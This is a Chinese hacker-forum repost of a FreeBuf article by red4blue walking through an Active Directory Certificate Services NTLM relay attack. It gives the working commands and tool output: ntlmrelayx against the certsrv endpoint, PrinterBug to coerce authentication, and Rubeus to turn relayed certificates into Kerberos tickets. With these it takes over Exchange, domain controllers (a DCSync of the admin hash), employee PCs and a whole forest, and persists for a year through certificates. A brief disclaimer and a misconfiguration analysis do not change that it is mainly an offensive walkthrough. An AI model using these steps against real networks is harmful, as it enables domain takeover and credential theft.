跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

全补丁域森林5秒沦陷?加密升级之信任雪崩

精选回复

发布于

全补丁域森林5秒沦陷?加密升级之信任雪崩

612edcbebbf54.jpg

*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

域控?Exchange? Sharepoint? 个人PC? 个人域账号/邮箱?域森林?统统只要5秒打下.
1628743409_6114a6f12263564aab5d9.jpg!sma

0x00 踩点和识别

域内定位CA机器的方法较多, 常见如下

certutil -config - -ping

1628743413_6114a6f5201b701d27620.jpg!sma

测试网络联通性

curl 192.168.44.150/certsrv/ -I

1628743416_6114a6f8119afdcf7cea5.jpg!sma

简单探测AD CS错误配置
1628743424_6114a700815ddc3a2f959.jpg!sma

0x01 攻击Exchange流水账

本地监听和指定攻击目标dc2 192.168.44.150

python ntlmrelayx.py -t http://192.168.44.150/certsrv/certfnsh.asp -smb2support --adcs

1628743429_6114a705c927fe0fe207a.jpg!sma

打印机协议触发回连Bypass监控规则

python printerbug.py corp/lower_user:[email protected] 192.168.44.131

1628743436_6114a70cd5dd1a62267cc.jpg!sma

中继获取证书

1628743442_6114a712a232fa184bc21.jpg!sma

[*] Base64 certificate of user EX03$: LONGLONGLONGSTR**********==

Rubeus一键梭/哈

Rubeus.exe asktgt /user:EX03$ /certificate:LONGLONGLONGSTR**********== /ptt

Rubeus生成票据并注入

1628743449_6114a719240ca5c93b79f.jpg!sma

C:\adcs>Rubeu_S.exe asktgt /user:EX03$ /certificate:bas64_cert_str /ptt //返回 v1.6.4 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=ex03.BSEC.corp [*] Building AS-REQ (w/ PKINIT preauth) for: 'BSEC.corp\EX03$' [+] TGT request successful! [*] base64(ticket.kirbi): doIF**LongLongStrOfBase64Ticket.Kirbi***== [+] Ticket successfully imported! ServiceName : krbtgt/BSEC.corp ServiceRealm : BSEC.CORP UserName : EX03$ UserRealm : BSEC.CORP StartTime : 2021/7/6 13:52:35 EndTime : 2021/7/6 23:52:35 RenewTill : 2021/7/13 13:52:35 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : XpO52RXSeAo6OdEfC+7kQQ==

注入票据前为低权限账号
1628743453_6114a71d1f453fe77ea65.jpg!sma

注入票据后

1628743459_6114a723534129ac9a82d.jpg!sma

生成的票据拿到rubues/mimikatz都是可以的,转换成ccache,也可以用到impacket工具包

1628743463_6114a727d2ebf6d0fca88.jpg!sma

生成的证书会在较长的时间内有效默认一年有效期

0x03 攻击域控

前部分操作如上文

1628743467_6114a72be974ecef39f7d.jpg!sma可以注入域控DC3$的身份

1628743472_6114a7302d32ab7e6190c.jpg!sma

接下来我们用DC3$的身份, 进行dcsync导出域管dcadmin的hash

1628743476_6114a7340296c1607ac3c.jpg!sma

0x04 攻击域内员工

补丁更新到最新. 系统为win10 ltsc
1628743479_6114a737ef97f0dcdbf9a.jpg!sma

发送几封恶意邮件, 使用最新版的outlookfoxmail打开

1628743484_6114a73c96a284fea8688.jpg!sma

均成功获取域账号win10的个人证书
1628743490_6114a742599325cefe416.jpg!sma

使用该证书登陆win10 ltsc这台机器, 或者查看邮件等,都是可以的. 无论域用户 win10修改多少次密码,密码强度如何, 证书默认会一年有效,并可以进行续签

1628743493_6114a745c0e25a6b58ce6.jpg!sma

0x05 域森林攻击

同样进行NTLM relay
1628743498_6114a74a0ccea6b392c92.jpg!sma使用relay签发的证书,可见身份已经从bsec.ccop\low_user到了forest-a.bsec.ccop\DC01$的域管机器账号
1628743501_6114a74de49ee9f62f410.jpg!sma

0x06 换个视野看证书

certsrv相关信息

1628743507_6114a75362a4545778aa9.jpg!sma

签发请求相关流量csr

POST /certsrv/certfnsh.asp HTTP/1.1
Host: 192.168.44.150
Accept-Encoding: identity
Content-Length: 1699
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Mode=newreq&CertRequest=-----BEGIN+CERTIFICATE+REQUEST-----*****-----END+CERTIFICATE+REQUEST-----&CertAttrib=Info_Template&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=

1628743511_6114a757d0d1ceb6cfe78.jpg!sma

微软AD CS签发证书流量

1628743514_6114a75ab62461332b082.jpg!sma

openssl查看relay盗签的证书信息

1628743515_6114a75b620d6094e7499.jpg!sma

1628743519_6114a75f6a0955a767436.jpg!sma

域CA的证书管理信息, 可以发现relay签发的证书,也可以吊销
1628743526_6114a76687400c3fa9ae2.jpg!sma

Certmgr.msc查看加域机器自动植入的Root CA

1628743536_6114a770b386f2eba47ca.jpg!sma

一张证书身份可以干什么

获取的不仅是Tickets

涉及的不仅是域内

每个加域的电脑都自动安装了AD CS下发的根证书想想攻击面

0x07 攻击链路分析和发散

利用AD CS(需要开启证书颁发机构Web注册Web接口), 将目标机器账号的权限, relay到AD CS 80 web实现pki身份的持久化(SMB Relay到 HTTP).

全程利用了域内正常服务打印机协议/Pki Web注册, 实现了低危害操作组合拳5秒打域控/Exchange/PC/域森林;

攻击入口不仅是打印机协议, 只要可控机器账号/域账号外发认证,即可实现组合拳,攻击面很广,攻击链路比较多.本文不过多赘述

另外用了PKI/HSM就一定安全了么?不管是开源或外采,抑或微软的PKI,攻防一直在持续.

为了不影响文章的主干和脉络清晰,很多点没有展开,如果有机会再来叨叨

0x08 漏洞引入思考

由于2019年的一系列smb/http/*->ldap等组合拳,微软和企业IT运维在全球范围内,迅速推进了ldaps的进程,里面开启pki系列服务时,如不小心勾选了证书颁发机构Web注册, 即会带来此次的攻击面. (默认只需要勾选证书颁发机构)
百度/谷歌部分ldaps开启部署教程中,不少截图标识了要勾选证书颁发机构Web注册

本文作者:red4blue, 转载请注明来自FreeBuf.COM

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。